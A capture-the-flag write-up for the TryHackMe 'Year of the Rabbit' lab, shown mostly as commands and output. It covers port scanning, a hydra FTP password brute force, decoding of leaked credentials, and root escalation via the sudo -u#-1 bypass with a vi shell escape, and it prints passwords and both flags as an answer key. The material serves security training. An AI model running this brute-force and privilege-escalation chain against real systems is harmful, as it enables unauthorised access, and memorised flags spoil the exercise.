Year of the Rabbit
Fun Box.
Nmap
1
2
3
4
5
6
7
8
Nmap scan report for 10.10.117.67
Host is up (0.15s latency).
Not shown: 65170 closed ports, 362 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
Recon
Port 21
Anonymous login is disabled.
Port 22
We don’t have credentials yet to login. So we will directly jump onto port 80.
Port 80
![[Pasted image 20211005160417.png]](/assets/images/Pasted image 20211005160417.png)
Default apache page.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(kali@kali)-[~/ctf/tryhackme/Year_of_the_Rabbit]
└─$ ffuf -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://10.10.117.67/FUZZ -e .php,.html,.txt
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.117.67/FUZZ
:: Wordlist : FUZZ: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt
:: Extensions : .php .html .txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
index.html [Status: 200, Size: 7853, Words: 2862, Lines: 190, Duration: 144ms]
assets [Status: 301, Size: 313, Words: 20, Lines: 10, Duration: 145ms]
We have assets apart from that we don’t have anything of interest.
![[Pasted image 20211005161057.png]](/assets/images/Pasted image 20211005161057.png)
Foothold
![[Pasted image 20211005170017.png]](/assets/images/Pasted image 20211005170017.png)
![[Pasted image 20211005170334.png]](/assets/images/Pasted image 20211005170334.png)
![[Pasted image 20211005170406.png]](/assets/images/Pasted image 20211005170406.png)
1
strings Hot_Babe.png
![[Pasted image 20211005172748.png]](/assets/images/Pasted image 20211005172748.png)
Make a list of passwords into a file as it is given of them is password.
![[Pasted image 20211005173036.png]](/assets/images/Pasted image 20211005173036.png)
Bruteforcing for the password with user ftpuser
1
2
3
4
5
6
7
8
9
10
11
┌──(kali@kali)-[~/ctf/tryhackme/Year_of_the_Rabbit]
└─$ hydra -l ftpuser -P password.txt 10.10.11.105 ftp
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-10-05 17:33:37
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 82 login tries (l:1/p:82), ~6 tries per task
[DATA] attacking ftp://10.10.11.105:21/
[21][ftp] host: 10.10.11.105 login: ftpuser password: 5iez1wGXKfPKQ
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-10-05 17:34:02
1
2
user : ftpuser
password: 5iez1wGXKfPKQ
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
┌──(kali@kali)-[~/ctf/tryhackme/Year_of_the_Rabbit]
└─$ ftp 10.10.11.105
Connected to 10.10.11.105.
220 (vsFTPd 3.0.2)
Name (10.10.11.105:kali): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 758 Jan 23 2020 Eli's_Creds.txt
226 Directory send OK.
ftp> get "Eli's_Creds.txt"
local: Eli's_Creds.txt remote: Eli's_Creds.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for Eli's_Creds.txt (758 bytes).
226 Transfer complete.
758 bytes received in 0.01 secs (59.9866 kB/s)
ftp>
1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(kali@kali)-[~/ctf/tryhackme/Year_of_the_Rabbit]
└─$ cat Eli\'s_Creds.txt
+++++ ++++[ ->+++ +++++ +<]>+ +++.< +++++ [->++ +++<] >++++ +.<++ +[->-
--<]> ----- .<+++ [->++ +<]>+ +++.< +++++ ++[-> ----- --<]> ----- --.<+
++++[ ->--- --<]> -.<++ +++++ +[->+ +++++ ++<]> +++++ .++++ +++.- --.<+
+++++ +++[- >---- ----- <]>-- ----- ----. ---.< +++++ +++[- >++++ ++++<
]>+++ +++.< ++++[ ->+++ +<]>+ .<+++ +[->+ +++<] >++.. ++++. ----- ---.+
++.<+ ++[-> ---<] >---- -.<++ ++++[ ->--- ---<] >---- --.<+ ++++[ ->---
--<]> -.<++ ++++[ ->+++ +++<] >.<++ +[->+ ++<]> +++++ +.<++ +++[- >++++
+<]>+ +++.< +++++ +[->- ----- <]>-- ----- -.<++ ++++[ ->+++ +++<] >+.<+
++++[ ->--- --<]> ---.< +++++ [->-- ---<] >---. <++++ ++++[ ->+++ +++++
<]>++ ++++. <++++ +++[- >---- ---<] >---- -.+++ +.<++ +++++ [->++ +++++
<]>+. <+++[ ->--- <]>-- ---.- ----. <
Brainfuck language code. Let;s decode it.
![[Pasted image 20211005173906.png]](/assets/images/Pasted image 20211005173906.png)
1
2
User: eli
Password: DSpDiM1wAEwid
User
![[Pasted image 20211005174011.png]](/assets/images/Pasted image 20211005174011.png)
1
2
3
4
5
eli@year-of-the-rabbit:~$ locate s3cr3t
/usr/games/s3cr3t
/usr/games/s3cr3t/.th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly!
/var/www/html/sup3r_s3cr3t_fl4g.php
eli@year-of-the-rabbit:~$
1
2
3
4
5
6
7
8
eli@year-of-the-rabbit:~$ cat /usr/games/s3cr3t/.th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly*
Your password is awful, Gwendoline.
It should be at least 60 characters long! Not just MniVCQVhQHUNI
Honestly!
Yours sincerely
-Root
eli@year-of-the-rabbit:~$
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
eli@year-of-the-rabbit:~$ su - gwendoline
Password:
gwendoline@year-of-the-rabbit:~$ id
uid=1001(gwendoline) gid=1001(gwendoline) groups=1001(gwendoline)
gwendoline@year-of-the-rabbit:~$ ls -rlta
total 24
-rw-r--r-- 1 gwendoline gwendoline 675 Jan 23 2020 .profile
-rw-r--r-- 1 gwendoline gwendoline 3515 Jan 23 2020 .bashrc
-rw-r--r-- 1 gwendoline gwendoline 220 Jan 23 2020 .bash_logout
lrwxrwxrwx 1 root root 9 Jan 23 2020 .bash_history -> /dev/null
-r--r----- 1 gwendoline gwendoline 46 Jan 23 2020 user.txt
drwxr-xr-x 2 gwendoline gwendoline 4096 Jan 23 2020 .
drwxr-xr-x 4 root root 4096 Jan 23 2020 ..
gwendoline@year-of-the-rabbit:~$ cat user.txt
THM{1107174691af9ff3681d2b5bdb5740b1589bae53}
Root
1
2
3
4
5
6
7
gwendoline@year-of-the-rabbit:~$ sudo -l
Matching Defaults entries for gwendoline on year-of-the-rabbit:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User gwendoline may run the following commands on year-of-the-rabbit:
(ALL, !root) NOPASSWD: /usr/bin/vi /home/gwendoline/user.txt
gwendoline@year-of-the-rabbit:~$
We can’t run as root directly, but sudo has a vulnerability as Sudo doesn’t check for the existence of the specified user id and executes the with arbitrary user id with the sudo priv
-u#-1 returns as 0 which is root’s id
1
sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt
1
:!cat /root/root.txt
![[Pasted image 20211005175941.png]](/assets/images/Pasted image 20211005175941.png)
Root Flag : THM{8d6f163a87a1c80de27a4fd61aef0f3a0ecf9161}
We have root Flag.